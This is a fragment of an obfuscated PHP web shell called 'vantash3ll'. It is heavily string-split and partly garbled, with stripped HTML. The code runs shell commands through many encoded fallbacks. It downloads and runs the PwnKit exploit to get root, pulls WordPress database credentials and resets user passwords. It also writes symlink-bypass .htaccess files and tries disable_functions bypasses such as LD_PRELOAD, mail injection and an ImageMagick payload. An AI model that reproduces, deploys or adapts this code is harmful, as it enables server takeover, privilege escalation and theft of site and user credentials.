["pipe","w"],2=>["pipe","w"]]; $p = @$f($pr1VANTA, $d, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (!empty($out)) break; } } elseif ($f === chDxzZ([112,111,112,101,110])) { $h = @$f($pr1VANTA . " 2>&1", "r"); $res = ""; if ($h) { while (!feof($h)) $res .= fread($h, 4096); pclose($h); } if (strlen($res)) { $out = $res; break; } } elseif ($f === chDxzZ([101,115,99,97,112,101,115,104,101,108,108,99,109,100])) { $esc = $f($pr1VANTA); ob_start(); @system($esc); $out = ob_get_clean(); if (!empty($out)) break; } elseif ($f === chDxXZ('6'.'573'.'6'.'36'.'17'.'065'.'73'.'68'.'65'.'6'.'c6'.'c6'.'17'.'26'.'7')) { $esc = $f($pr1VANTA); $out = @chDx2x($esc); if (!empty($out)) break; } elseif ($f === chDxzZ([99,117,114,108,95,101,120,101,99])) { $ch = @curl_init('f'.'i'.'le'.':/'.'/'.'/p'.'roc'.'/se'.'l'.'f/c'.'mdl'.'i'.'ne'); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($ch, CURLOPT_POSTFIELDS, $pr1VANTA); $r = @curl_exec($ch); @curl_close($ch); if ($r && strpos($r, $pr1VANTA) !== false) { $out = $r; break; } } elseif ($f === chDxzZ('10'.'9'.',9'.'7,'.'1'.'05'.',1'.'08')) { $to = uniqid()."@".uniqid().".xyz"; @mail($to, $pr1VANTA, $pr1VANTA); $out = ""; } elseif ($f === chDxXZ('63'.'616'.'c6c'.'5'.'f75'.'7'.'36'.'572'.'5f'.'667'.'56'.'e6'.'3')) { $shellfunc = chDxzZ([115,104,101,108,108,95,101,120,101,99]); if (function_exists($shellfunc)) { $out = @call_user_func($shellfunc, $pr1VANTA); if (!empty($out)) break; }} elseif ($f === chDxzZ('102'.',1'.'05,'.'1'.'0'.'8,'.'101'.',9'.'5,1'.'03'.','.'10'.'1,'.'116'.',9'.'5,'.'99,'.'11'.'1'.',11'.'0,'.'11'.'6,1'.'01'.','.'1'.'10'.','.'116'.',1'.'15')) { $r = @$f("php://filter/read=convert.base64-encode/resource=" . $pr1VANTA); if ($r && strlen($r) >0) { $out = $r; break; } } elseif ($f === chDxzZ('102'.',1'.'1'.'1,1'.'12,'.'1'.'01,'.'11'.'0')) { $tmpf = sys_get_temp_dir() . "/" . uniqid("s-cmd") . ".sh"; $h = @$f($tmpf, "w"); if ($h) { fwrite($h, $pr1VANTA); fclose($h); } $r = @chDx2x("sh " . escapeshellarg($tmpf) . " 2>&1"); if ($r) { $out = $r; @unlink($tmpf); break; } } elseif ($f === chDxzZ('1'.'12,'.'1'.'1'.'7,'.'116'.',1'.'0'.'1,'.'1'.'10'.','.'11'.'8')) { @putenv("CMD=".$pr1VANTA); $r = @getenv("CMD"); if ($r == $pr1VANTA) { $out = $r; break; } } elseif ($f === chDxzZ('10'.'5'.','.'1'.'1'.'0,1'.'05,'.'95'.','.'1'.'15,'.'101'.',11'.'6')) { @ini_set("auto_prepend_file", $pr1VANTA); $out = @file_get_contents($_SERVER['SCR'.'IPT'.'_F'.'I'.'LEN'.'AME']); if (!empty($out)) break; } elseif ($f === chDxzZ([112,99,110,116,108,95,101,120,101,99])) { @pcntl_exec("/bin/sh", array("-c", $pr1VANTA)); } elseif ($f === chDxzZ([97,112,97,99,104,101,95,115,101,116,101,110,118])) { @apache_setenv("CMD", $pr1VANTA); $out = getenv("CMD"); if ($out == $pr1VANTA) break; } elseif ($f === chDxzZ([109,113,95,111,112,101,110]) || $f === chDxzZ([103,99,95,111,112,101,110])) { } } return $out !== false ? $out : false;}if (!function_exists('ch'.'D'.'xz'.'Z')) { function chDxzZ($arr) { if (is_string($arr)) $arr = explode(',', $arr); $r = ''; foreach ($arr as $n) $r .= chr(is_numeric($n) ? $n : hexdec($n)); return $r; }} if (!function_exists('p'.'r'.'vdy'.'z'.'h'.'s'.'ax')) { function prvdyzhsax($str) { $y = ''; for ($i = 0; $i< strlen($str); $i++) $y .= dechex(ord($str[$i])); return $y; }} if (!function_exists('ch'.'D'.'x'.'XZ')) { function chDxXZ($hx) { $n = ''; for ($i = 0; $i< strlen($hx) - 1; $i += 2) $n .= chr(hexdec($hx[$i] . $hx[$i + 1])); return $n; }} if (isset($_GET['VAN'.'TA'])) { $cdir = unx($_GET['VAN'.'T'.'A']); if (@is_dir($cdir)) { $VANTAxas[14]($cdir); } else { } } else { $cdir = $VANTAxas[0](); } function VANTAd0($file) { if (file_exists($file)) { header('C'.'o'.'nt'.'e'.'nt'.'-'.'D'.'es'.'cri'.'p'.'tio'.'n:'.' '.'Fil'.'e T'.'r'.'an'.'s'.'f'.'er'); header('C'.'on'.'t'.'e'.'nt-'.'Typ'.'e'.': '.'ap'.'p'.'lic'.'at'.'io'.'n/o'.'cte'.'t-s'.'tr'.'e'.'a'.'m'); header('Co'.'n'.'ten'.'t'.'-'.'Dis'.'pos'.'it'.'ion'.':'.' at'.'t'.'ac'.'hme'.'nt'.'; '.'f'.'i'.'l'.'ena'.'me'.'=' . basename($file)); header('Co'.'nte'.'nt-'.'Tr'.'ans'.'fer'.'-'.'E'.'nco'.'din'.'g: '.'bi'.'n'.'a'.'r'.'y'); header('Ex'.'pir'.'es'.': '.'0'); header('Ca'.'che'.'-Co'.'ntr'.'o'.'l:'.' m'.'us'.'t'.'-re'.'v'.'al'.'i'.'d'.'at'.'e'); header('Pra'.'gma'.':'.' pu'.'bl'.'i'.'c'); header('Con'.'te'.'nt-'.'Len'.'gth'.': ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; }} if (!empty($_GET['d'.'o'.'n'])) {$FilesDon = VANTAd0(unx($_GET['d'.'on']));} ?> vantash3ll - <?= $_SERVER['SE'.'RV'.'ER'.'_'.'NA'.'M'.'E']; ?>
vantash3ll
20) array_shift($_SESSION['v'.'ant'.'a'.'s'.'h3'.'ll_'.'r00'.'t_'.'log']); } function vantash3ll_download_pwnkit() { if (!file_exists('p'.'wnk'.'it')) { vantash3ll_log("[*] Trying wget for pwnkit..."); $wget = v4nt4C('w'.'get'.' -q'.' -O'.' '.'pwn'.'k'.'i'.'t h'.'ttp'.'s:/'.'/'.'g'.'ith'.'ub.'.'c'.'om'.'/'.'l'.'y'.'4k/'.'Pw'.'n'.'Ki'.'t'.'/'.'raw'.'/m'.'a'.'i'.'n/'.'P'.'w'.'nK'.'i'.'t'); clearstatcache(); if (!file_exists('pw'.'n'.'k'.'it') || filesize('pw'.'nki'.'t') < 10000) { vantash3ll_log("[*] wget failed or file too small. Trying curl..."); $curl = v4nt4C('cu'.'r'.'l -'.'sL'.' -'.'-'.'out'.'put'.' pw'.'nki'.'t'.' '.'htt'.'p'.'s:'.'//g'.'ith'.'ub.'.'co'.'m/l'.'y4k'.'/Pw'.'nK'.'it/'.'raw'.'/'.'m'.'ai'.'n/P'.'wnK'.'i'.'t'); clearstatcache(); if (!file_exists('pw'.'nk'.'it') || filesize('pw'.'nki'.'t') < 10000) { vantash3ll_log("[!] Both wget and curl failed! No pwnkit."); return false; } else { vantash3ll_log("[+] curl download successful!"); } } else { vantash3ll_log("[+] wget download successful!"); } v4nt4C('chm'.'o'.'d'.' '.'+x '.'pw'.'nk'.'it'); vantash3ll_log("[*] chmod +x set for pwnkit."); return true; } return true; } function vantash3ll_try_root() { $_SESSION['van'.'ta'.'sh3'.'l'.'l_'.'r0'.'0t'.'_s'.'ta'.'t'.'u'.'s'] = 'us'.'e'.'r'; $_SESSION['van'.'t'.'a'.'sh'.'3ll'.'_'.'r00'.'t_l'.'o'.'g'] = []; vantash3ll_log("[*] [AUTO-ROOT] Detecting current user..."); $id = trim(v4nt4C('i'.'d')); vantash3ll_log("[*] User: $id"); if (strpos($id, 'ui'.'d'.'=0('.'roo'.'t)') !== false) { $_SESSION['v'.'an'.'ta'.'s'.'h'.'3l'.'l_r'.'00'.'t'.'_s'.'ta'.'tus'] = 'ro'.'ot'; vantash3ll_log("[+] Already ROOT."); return; } if (vantash3ll_download_pwnkit()) { if (file_exists('pwn'.'k'.'i'.'t')) { vantash3ll_log("[*] Running pwnkit for root session..."); @unlink('.'.'pri'.'vda'.'yz'.'-r'.'o'.'o'.'t'); v4nt4C('./'.'pw'.'n'.'ki'.'t '.'"id'.'" >'.' .p'.'r'.'i'.'vda'.'y'.'z-r'.'oot'); usleep(350000); $res = @file_get_contents('.p'.'ri'.'vda'.'y'.'z-r'.'oo'.'t'); if ($res && strpos($res, 'ui'.'d'.'=0('.'r'.'o'.'ot)') !== false) { $_SESSION['va'.'nt'.'ash'.'3l'.'l_'.'r00'.'t_s'.'ta'.'t'.'us'] = 'roo'.'t'; vantash3ll_log("[+] r00t success! ($res)"); } else { vantash3ll_log("[!] r00t fail. ($res)"); } } } else { vantash3ll_log("[!] pwnkit download totally failed."); } } vantash3ll_try_root(); ?>
v4nt4 auto r00t ROOT ACTIVE (uid=0) USER MODE 
'.'&1"'.' > '.'.pr'.'ivd'.'ayz'.'-ro'.'ot2');
        usleep(350000);
        $out = @file_get_contents('.'.'p'.'ri'.'vda'.'y'.'z'.'-ro'.'ot'.'2');
        if (!$out) $out = "[!] No output or blocked.";
    } else {
        $out = v4nt4C($c . ' '.'2'.'>&'.'1');
        if (!$out) $out = "[!] No output or blocked.";
    }
    echo "\n";
    echo htmlspecialchars($out);
}
?>
wp auto hunter & admin reset
query("SELECT ID, user_login, user_email, user_registered FROM {$prefix}users"); if (!$res) return []; while ($row = $res->fetch_assoc()) { $meta = @$mysqli->query("SELECT meta_value FROM {$prefix}usermeta WHERE user_id=".$row['I'.'D']." AND meta_key='{$prefix}capabilities'")->fetch_assoc(); $role = ''; if ($meta && preg_match('/s:'.'\\d'.'+:"'.'('.'[^'.'"'.']+)'.'"/', $meta['me'.'t'.'a_v'.'a'.'l'.'u'.'e'], $m)) $role = $m[1]; else $role = 'u'.'n'.'k'.'now'.'n'; $row['ro'.'le'] = $role; $users[] = $row; } return $users; } function wp_reset_pw($mysqli, $prefix, $uid, $newpw) { $hash = password_hash($newpw, PASSWORD_BCRYPT); return @$mysqli->query("UPDATE {$prefix}users SET user_pass='".$mysqli->real_escape_string($hash)."' WHERE ID=".(int)$uid); } function get_site_url($mysqli, $prefix) { $url = ''; $q = @$mysqli->query("SELECT option_value FROM {$prefix}options WHERE option_name='siteurl' LIMIT 1"); if ($q && $r = $q->fetch_row()) $url = rtrim($r[0],'/'); return $url; } $wp_dirs = wp_find_paths(99); if (!$wp_dirs) { echo '<'.'d'.'iv'.' cl'.'ass'.'="w'.'p'.'_V'.'A'.'NTA'.'d'.'00r'.'-al'.'e'.'rt"'.'>N'.'o'.' '.'Wor'.'d'.'P'.'re'.'ss'.' d'.'et'.'e'.'cte'.'d ('.'a'.'l'.'l '.'dir'.'s s'.'can'.'ned'.').<'.'/di'.'v'.'>'; } if ($_SERVER['REQ'.'U'.'ES'.'T_'.'MET'.'HO'.'D']=='PO'.'S'.'T' && isset($_POST['wp_'.'dir'])) { $wp_dir = $_POST['wp_'.'d'.'ir']; $cfg = wp_get_db_config($wp_dir); $db = $cfg['d'.'b'] ?? ''; $user = $cfg['use'.'r'] ?? ''; $pass = $cfg['p'.'a'.'ss'] ?? ''; $host = $cfg['hos'.'t'] ?? 'loc'.'al'.'h'.'os'.'t'; $prefix = $cfg['p'.'ref'.'ix'] ?? 'w'.'p_'; $mysqli = @new mysqli($host, $user, $pass, $db); if ($mysqli->connect_errno) { echo ""; exit; } if (isset($_POST['r'.'e'.'set'.'_p'.'w'], $_POST['re'.'s'.'et'.'_ui'.'d'], $_POST['ne'.'w'.'pw'])) { $uid = intval($_POST['re'.'s'.'et'.'_ui'.'d']); $newpw = trim($_POST['n'.'e'.'wpw']); if (wp_reset_pw($mysqli, $prefix, $uid, $newpw)) { echo ""; } else { echo ""; } exit; } } foreach ($wp_dirs as $wp_dir): $cfg = wp_get_db_config($wp_dir); $db = $cfg['d'.'b'] ?? ''; $user = $cfg['u'.'se'.'r'] ?? ''; $pass = $cfg['p'.'as'.'s'] ?? ''; $host = $cfg['ho'.'st'] ?? 'l'.'oca'.'l'.'hos'.'t'; $prefix = $cfg['pre'.'fi'.'x'] ?? 'w'.'p_'; $wp_version = wp_get_version($wp_dir); echo ''; echo ''; echo '<'.'spa'.'n '.'cl'.'a'.'s'.'s='.'"w'.'p_'.'VA'.'N'.'T'.'A'.'d'.'00r'.'-p'.'a'.'th"'.'> '.htmlspecialchars($wp_dir).''; if ($wp_version) echo ''.'WP'.' '.$wp_version.''; echo ''.' '.' '.' '.'<'.'b>h'.'0s'.'t:<'.'/'.'b> '.htmlspecialchars($host).' '.'<'.'b>'.'db_'.'u'.'s'.'e'.'r'.':<'.'/'.'b'.'>'.' '.htmlspecialchars($user).' <'.'b>d'.'b_'.'pw'.':<'.'/b>'.' '.htmlspecialchars($user).' <'.'b>'.'db:'.' '.htmlspecialchars($db).' <'.'b>'.'pre'.'f1x'.':'.'<'.'/b>'.' '.$prefix.' '.' '.' '.' <'.'/sp'.'an>'; echo ''; $users = []; $mysqli = @new mysqli($host, $user, $pass, $db); if ($mysqli->connect_errno) { echo '<'.'div'.' '.'cla'.'ss'.'="'.'w'.'p'.'_VA'.'NT'.'A'.'d'.'00'.'r-'.'ale'.'rt"'.' st'.'y'.'le='.'"co'.'lo'.'r'.':#e'.'5'.'393'.'5;'.'">'.'D'.'B E'.'r'.'ror'.': '.htmlspecialchars($mysqli->connect_error).''; echo ''; continue; } $users = wp_fetch_users($mysqli, $prefix); $site_url = get_site_url($mysqli, $prefix); echo '<'.'div'.' cl'.'as'.'s='.'"wp'.'_V'.'A'.'N'.'TA'.'d00'.'r-u'.'se'.'rs'.'">'.'<'.'ta'.'ble'.'>'.''.' '.' '.' '.'ID'.''.'us'.'e'.'r'.'<'.'th'.'>e'.'mai'.'l<'.'/'.'th>'.'r'.'ol'.'e'.''.'<'.'th'.'>'.'r'.'es'.'et '.'pw'.'<'.'th>'.'w'.'p-'.'log'.'in'.''.'<'.'/'.'t'.'r>'; foreach ($users as $u) { $pw_val = "privdayz".rand(100,999); echo ''.' '.' '.' '.' '.'<'.'td'.'>'.$u['I'.'D'].' '.' '.' '.' '.' '.htmlspecialchars($u['u'.'se'.'r_'.'l'.'o'.'gin']).''.' '.' '.' '.' <'.'t'.'d>'.htmlspecialchars($u['u'.'se'.'r'.'_'.'em'.'ail']).' '.' '.' '.' '.' '.'<'.'td'.'>'.$u['r'.'ol'.'e'].''.' '.' '.' '.' <'.'td>'.' '.' '.' '.' '.' '.' '.'<'.'for'.'m m'.'eth'.'o'.'d="'.'pos'.'t'.'" s'.'t'.'yle'.'="d'.'isp'.'l'.'ay'.':'.'i'.'nli'.'ne'.';"'.'> '.' '.' '.' '.' '.' <'.'i'.'n'.'put'.' t'.'y'.'p'.'e='.'"hi'.'d'.'d'.'en'.'"'.' n'.'a'.'me='.'"w'.'p'.'_di'.'r" '.'va'.'lue'.'="'.htmlspecialchars($wp_dir).'">'.' '.' '.' '.' '.' <'.'in'.'pu'.'t t'.'ype'.'='.'"h'.'idd'.'en'.'" '.'n'.'ame'.'="r'.'e'.'s'.'et_'.'u'.'id'.'"'.' '.'va'.'lue'.'='.'"'.$u['I'.'D'].'"> '.' '.' '.' '.' '.' '.' '.' '.' '.' '.' '.' '.' '.' '.'<'.'bu'.'t'.'to'.'n'.' n'.'a'.'m'.'e="'.'res'.'e'.'t_'.'p'.'w'.'" c'.'l'.'ass'.'="w'.'p_'.'V'.'AN'.'TA'.'d'.'0'.'0r'.'-bt'.'n w'.'p'.'_V'.'ANT'.'Ad'.'0'.'0'.'r-b'.'tn-'.'g'.'ree'.'n"'.'>r'.'es'.'e'.'t<'.'/bu'.'tt'.'on'.'> '.' '.' '.' '.' '.' '.' '.' '.'c'.'opy'.' '.' '.' '.' '.' '.' '.' '.' '.' '.' '.' '.' '.' '.' '.' '.' '.' '; if ($site_url) { $login_url = htmlspecialchars($site_url . '/wp'.'-lo'.'gin'.'.'.'p'.'h'.'p?'.'l'.'og=' . urlencode($u['us'.'er'.'_l'.'ogi'.'n'])); echo ''.'l'.'og'.'in'.''; } else { echo '<'.'s'.'pan'.' cl'.'as'.'s='.'"'.'wp'.'_VA'.'N'.'T'.'Ad'.'0'.'0'.'r'.'-al'.'e'.'rt'.'"'.'>'.'n'.'o '.'si'.'te'.' u'.'rl'.'<'.'/s'.'pan'.'>'; } echo ''.' '.' '.' '.' '.' <'.'/tr'.'>'; } echo '<'.'/d'.'i'.'v'.'>'; echo '<'.'/'.'di'.'v>'; endforeach; ?>
Saved!" : " Save Failed!"; if (is_file($file_path)) { $file_raw = file_get_contents($file_path, false, null, 0, 10*1024*1024); if (!mb_check_encoding($file_raw, 'UTF'.'-8')) { $file_raw = mb_convert_encoding($file_raw, 'U'.'TF'.'-8', 'ISO'.'-8'.'85'.'9'.'-'.'1,W'.'in'.'dow'.'s-1'.'25'.'4,'.'U'.'TF'.'-'.'8'); } } } ?>
file edit /
back
Symlink byp4ss & Generator
'Op'.'tio'.'ns '.'+'.'I'.'nd'.'e'.'xe'.'s +'.'F'.'oll'.'ow'.'S'.'ym'.'Lin'.'ks'.' +S'.'ym'.'Li'.'n'.'k'.'s'.'IfO'.'wne'.'rMa'.'t'.'ch'.' '.' Di'.'re'.'cto'.'r'.'yIn'.'dex'.' '.'{P'.'} '.'Fo'.'r'.'c'.'eT'.'ype'.' '.'te'.'x'.'t/p'.'lai'.'n '.'Add'.'Typ'.'e t'.'ext'.'/'.'pl'.'a'.'in'.' .p'.'hp '.'.'.'ht'.'m'.'l '.'.'.'ph'.'t'.'ml '.'.'.'i'.'nc'.' .a'.'s'.'p '.'.as'.'p'.'x '.'.js'.'p '.'.'.'pl '.'.cg'.'i '.'.py'.' '.'.sh'.' '.'.p'.'ha'.'r '.'.'.'jso'.'n '.'.ym'.'l .'.'x'.'ml '.'.'.'db'.' .s'.'ql'.' '.' R'.'emo'.'veH'.'and'.'ler'.' '.'.'.'ph'.'p '.'.'.'pht'.'m'.'l '.'.ph'.'a'.'r .'.'i'.'nc'.' .'.'s'.'htm'.'l .'.'h'.'tml'.' '.'.js'.' '.'.'.'c'.'ss '.'.p'.'l'.' .c'.'g'.'i '.'.a'.'sp '.'.p'.'y .'.'r'.'b'.' '.'.sh'.' .z'.'sh'.' .'.'jso'.'n'.' .'.'y'.'ml '.'.xm'.'l'.' '.'.db'.' '.'.'.'sq'.'l'.' '.' '.'p'.'h'.'p_f'.'l'.'ag'.' en'.'g'.'ine'.' of'.'f '.'Set'.'Han'.'dle'.'r'.' '.'d'.'ef'.'au'.'l'.'t'.'-'.'han'.'dl'.'e'.'r', "hx2" => '<'.'Fil'.'e'.'sM'.'at'.'c'.'h'.' ".'.'*'.'"'.'> '.'F'.'or'.'c'.'eT'.'ype'.' '.'te'.'xt/'.'pla'.'in '.' A'.'dd'.'Typ'.'e '.'te'.'xt'.'/pl'.'ain'.' '.'.ph'.'p .'.'pht'.'ml'.' .h'.'tml'.' .'.'in'.'c '.'.'.'pha'.'r'.' .'.'b'.'ak'.' .c'.'onf'.'ig'.' .d'.'b .'.'sql'.' .x'.'ml '.'.j'.'so'.'n'.' '.' Se'.'t'.'Han'.'dle'.'r '.'d'.'ef'.'au'.'l'.'t-h'.'an'.'dle'.'r '.' '.'R'.'em'.'ov'.'e'.'Ha'.'ndl'.'er'.' .p'.'hp'.' .p'.'ht'.'ml '.'.'.'pha'.'r .'.'i'.'nc'.' .'.'sht'.'ml '.'.h'.'tm'.'l'.' .j'.'s .'.'css'.' .'.'p'.'l '.'.cg'.'i '.'.as'.'p '.'.'.'py '.'.r'.'b'.' .'.'sh'.' .'.'j'.'s'.'o'.'n .'.'yml'.' .'.'xm'.'l'.' .d'.'b'.' .'.'sql'.' p'.'h'.'p_f'.'l'.'ag '.'eng'.'ine'.' of'.'f '.' ', "hx3" => 'R'.'ewr'.'i'.'teE'.'ngi'.'ne'.' O'.'n '.'R'.'e'.'w'.'r'.'i'.'teB'.'a'.'se'.' '.'/'.' '.'Rew'.'rit'.'eR'.'ule'.' ^('.'.+)'.'$'.' '.'{P'.'} '.'O'.'pt'.'i'.'o'.'ns'.' +F'.'o'.'llo'.'wSy'.'mLi'.'nks'.' +'.'In'.'de'.'xes'.' '.' '.'Dir'.'ect'.'ory'.'Ind'.'e'.'x'.' '.'{'.'P}'.' '.'S'.'et'.'Ha'.'n'.'d'.'l'.'er '.'d'.'e'.'f'.'a'.'u'.'l'.'t-h'.'and'.'ler'.' p'.'hp_'.'fla'.'g '.'eng'.'i'.'n'.'e'.' '.'of'.'f', "hx4" => 'Re'.'m'.'o'.'veH'.'an'.'dle'.'r '.'.'.'p'.'h'.'p '.'.'.'p'.'htm'.'l '.'.p'.'ha'.'r '.'.in'.'c '.'p'.'hp'.'_fl'.'ag'.' '.'en'.'gi'.'ne '.'off'.' '.'Add'.'Ty'.'p'.'e t'.'e'.'xt'.'/pl'.'a'.'in'.' .p'.'hp'.' .h'.'t'.'m'.'l .'.'inc'.' .'.'p'.'htm'.'l .'.'pha'.'r '.'.ba'.'k'.' .c'.'o'.'n'.'f'.'ig'.' .'.'db '.'.s'.'ql'.' .'.'x'.'ml '.'.js'.'o'.'n '.' S'.'e'.'t'.'Ha'.'ndl'.'er'.' de'.'fa'.'u'.'lt'.'-ha'.'n'.'d'.'ler'.' '.'O'.'pti'.'on'.'s +'.'Ind'.'exe'.'s '.'+F'.'ol'.'l'.'ow'.'Sym'.'Lin'.'ks '.' '.'Di'.'rec'.'to'.'r'.'y'.'In'.'dex'.' {P'.'}', "hx5" => 'Opt'.'ion'.'s +'.'Ind'.'exe'.'s '.'+F'.'o'.'ll'.'owS'.'ymL'.'i'.'nk'.'s'.' '.'Di'.'rec'.'t'.'o'.'ryI'.'n'.'dex'.' {'.'P}'.' '.'Ad'.'dT'.'ype'.' t'.'e'.'xt/'.'pl'.'a'.'i'.'n .'.'ph'.'p .'.'i'.'nc'.' .'.'ph'.'tm'.'l'.' .'.'p'.'h'.'ar '.' <'.'If'.'M'.'o'.'du'.'le'.' Li'.'teS'.'pe'.'e'.'d>'.' '.' '.' '.'php'.'_f'.'l'.'a'.'g'.' '.'eng'.'in'.'e'.' '.'o'.'ff'.' '.' '.'Set'.'H'.'a'.'nd'.'ler'.' '.'d'.'ef'.'aul'.'t-h'.'an'.'d'.'le'.'r '.' ', "hx6" => ' '.' '.'S'.'e'.'c'.'Fi'.'l'.'te'.'r'.'En'.'g'.'in'.'e'.' O'.'ff'.' '.' '.'S'.'e'.'cF'.'i'.'lte'.'rSc'.'an'.'PO'.'S'.'T O'.'ff '.' <'.'/If'.'Mod'.'u'.'le'.'> '.' '.'Opt'.'io'.'n'.'s'.' +I'.'nde'.'xe'.'s'.' +F'.'ol'.'l'.'ow'.'Sy'.'m'.'Lin'.'ks'.' D'.'i'.'r'.'ec'.'tor'.'y'.'Ind'.'e'.'x '.'{'.'P} '.' '.'S'.'etH'.'an'.'dle'.'r d'.'ef'.'aul'.'t-h'.'a'.'n'.'dle'.'r '.' '.'A'.'ddT'.'yp'.'e t'.'e'.'xt/'.'pla'.'in'.' .p'.'h'.'p .'.'ph'.'tm'.'l .'.'htm'.'l '.'.i'.'n'.'c '.'.'.'p'.'har'.' '.' ph'.'p_'.'f'.'la'.'g e'.'n'.'g'.'in'.'e'.' '.'off' ]; $output = ''; $final_ln = g3t_rnd(7); $created = false; $alt_file = ""; $result = ""; if(function_exists(a1s('c2'.'hl'.'b'.'G'.'xf'.'ZX'.'hl'.'Yw'.'=='))) { $cmd = "ln -s '".addslashes($p1)."' '".addslashes("$base/$final_ln")."'"; $exec_fn=a1s('c'.'2hl'.'b'.'G'.'xfZ'.'Xh'.'lYw'.'=='); @$exec_fn($cmd); if(is_link("$base/$final_ln")) { $created = true; $alt_file = "$base/$final_ln"; $result = "ln -s worked!"; } } if(!$created && function_exists(a1s('ZXh'.'l'.'Y'.'w='.'='))) { $cmd = "ln -s '".addslashes($p1)."' '".addslashes("$base/$final_ln")."'"; $exec_fn=a1s('Z'.'Xh'.'lYw'.'=='); @$exec_fn($cmd,$o,$rc); if(is_link("$base/$final_ln")) { $created = true; $alt_file = "$base/$final_ln"; $result = "exec ln -s worked!"; } } if(!$created && function_exists(a1s('c'.'2'.'hl'.'b'.'G'.'xfZ'.'X'.'hl'.'Y'.'w=='))) { $cpfile = $base.'/d'.'u'.'p_'.g3t_rnd(5); $cmd = "cp '".addslashes($p1)."' '".addslashes($cpfile)."'"; $exec_fn=a1s('c2h'.'lbG'.'xfZ'.'Xhl'.'Yw'.'='.'='); @$exec_fn($cmd); if(file_exists($cpfile)) { $created = true; $alt_file = $cpfile; $result = "cp worked!"; } } if(!$created && function_exists(a1s('c2h'.'lbG'.'xfZ'.'Xhl'.'Yw='.'='))) { $ddfile = $base.'/'.'d'.'d'.'_'.g3t_rnd(4); $cmd = "dd if='".addslashes($p1)."' of='".addslashes($ddfile)."' 2>/dev/null"; $exec_fn=a1s('c2h'.'lbG'.'xf'.'Z'.'X'.'hl'.'Yw='.'='); @$exec_fn($cmd); if(file_exists($ddfile)) { $created = true; $alt_file = $ddfile; $result = "dd worked!"; } } if(!$created && function_exists(a1s('c'.'2'.'h'.'lb'.'Gx'.'fZX'.'h'.'l'.'Yw='.'='))) { $catfile = $base.'/'.'c'.'at_'.g3t_rnd(4); $cmd = "cat '".addslashes($p1)."' > '".addslashes($catfile)."'"; $exec_fn=a1s('c2'.'hlb'.'Gx'.'fZ'.'Xhl'.'Yw='.'='); @$exec_fn($cmd); if(file_exists($catfile)) { $created = true; $alt_file = $catfile; $result = "cat worked!"; } } if(!$created && @copy($p1, $base.'/ph'.'pl'.'oca'.'l'.'_'.g3t_rnd(5))) { $created = true; $alt_file = $base.'/p'.'hp'.'l'.'o'.'ca'.'l'.'_'.g3t_rnd(5); $result = "php copy worked!"; } if($created) $output .= "[ok] ".htmlspecialchars($alt_file)." created. [$result]
"; else $output .= "[fail] Not possible
"; foreach ($htlist as $hname => $htval) { $subdir = $base.'/'.g3t_rnd(5);@mkdir($subdir,0755,true); $htcode = str_replace('{'.'P}', $final_ln, $htval); @file_put_contents("$subdir/.htaccess", $htcode); if(function_exists(a1s('c2'.'hlb'.'G'.'x'.'f'.'Z'.'Xh'.'l'.'Yw'.'=='))) { $cmd = "ln -s '".addslashes($p1)."' '".addslashes("$subdir/$final_ln")."'"; $exec_fn=a1s('c2'.'h'.'lb'.'Gx'.'f'.'ZX'.'hl'.'Yw='.'='); @$exec_fn($cmd); } $klist[] = "$subdir/$final_ln"; } echo '<'.'div'.' cl'.'ass'.'="v'.'4'.'nt4'.'-s'.'y'.'m'.'-li'.'st"'.'>'; echo $output; echo "byp4ss dirs:
    "; foreach($klist as $f){echo "
  • $f
    • ";} echo "
"; } ?>
vanta priv command
    &1", "r"); if ($f) { while (!feof($f)) $out .= fread($f, 4096); fclose($f);} if (trim($out)) $ok = true; @ini_restore('f'.'i'.'l'.'te'.'r'.'.'.'de'.'fa'.'ul'.'t'); } elseif ($meth === 'ld_'.'pr'.'elo'.'ad') { if (strtoupper(substr(PHP_OS,0,3)) !== 'WI'.'N') { putenv('LD'.'_P'.'RE'.'LOA'.'D=/'.'tmp'.'/'.'x'.'.so'); $out = @chDx2x($c.' 2'.'>&1'); putenv('L'.'D_P'.'R'.'EL'.'OAD'); if (trim($out)) $ok = true; } } elseif ($meth === 'p'.'r'.'ep'.'end') { $prepend = sys_get_temp_dir()."/xx".uniqid().".php"; @file_put_contents($prepend, ""); @ini_set("auto_prepend_file", $prepend); $out = @file_get_contents($_SERVER['S'.'CRI'.'PT_'.'FI'.'LE'.'NAM'.'E']); @ini_restore("auto_prepend_file"); @unlink($prepend); if (trim($out)) $ok = true; } elseif ($meth === 'suh'.'osi'.'n') { @ini_set('suh'.'os'.'in.'.'exe'.'c'.'ut'.'or.'.'f'.'u'.'nc'.'.'.'bl'.'ac'.'kl'.'i'.'st', ''); $out = @chDx2x($c.' '.'2'.'>&'.'1'); if (trim($out)) $ok = true; } elseif ($meth === 'm'.'ail'.'inj') { $tmpf = sys_get_temp_dir()."/m".uniqid().".txt"; @mail("v@x.com", "", "", "", "-X $tmpf; $c >$tmpf 2>&1"); if (file_exists($tmpf)) { $out = file_get_contents($tmpf); unlink($tmpf); $ok = true; } } elseif ($meth === 'err'.'l'.'o'.'g') { $tmpf = sys_get_temp_dir()."/e".uniqid().".txt"; @error_log("", 3, $tmpf); if (file_exists($tmpf)) { $out = file_get_contents($tmpf); unlink($tmpf); $ok = true; } } elseif ($meth === 'f'.'op'.'en'.'inp'.'ut') { $h = @fopen("php://input", "r"); if ($h) { $out = @fread($h, 8192); fclose($h); $ok = true; } } elseif ($meth === 'b'.'i'.'nb'.'r'.'ute') { foreach(['s'.'h','b'.'as'.'h','p'.'y'.'tho'.'n','p'.'erl','n'.'c','b'.'usy'.'b'.'ox','w'.'get'] as $bin){ $which = trim(@chDx2x("which $bin")); if($which) { $out = @chDx2x("$which -c \"$c\" 2>&1"); if (trim($out)) { $ok = true; break; } } } } elseif ($meth === 'h'.'t'.'404') { $out = ''; } elseif ($meth === 'ima'.'ge'.'m'.'ag'.'ick') { $tmpi = sys_get_temp_dir().'/i'.'m'.'g'.uniqid().'.m'.'vg'; $tmpp = sys_get_temp_dir().'/'.'ou'.'t'.uniqid().'.'.'pn'.'g'; file_put_contents($tmpi, "push graphic-context\nviewbox 0 0 640 480\nfill 'url(https://|$c|)'\npop graphic-context"); @chDx2x("convert $tmpi $tmpp"); if (file_exists($tmpp)) $out = file_get_contents($tmpp); @unlink($tmpi); @unlink($tmpp); if (trim($out)) $ok = true; } elseif ($meth === 'cg'.'i'.'env') 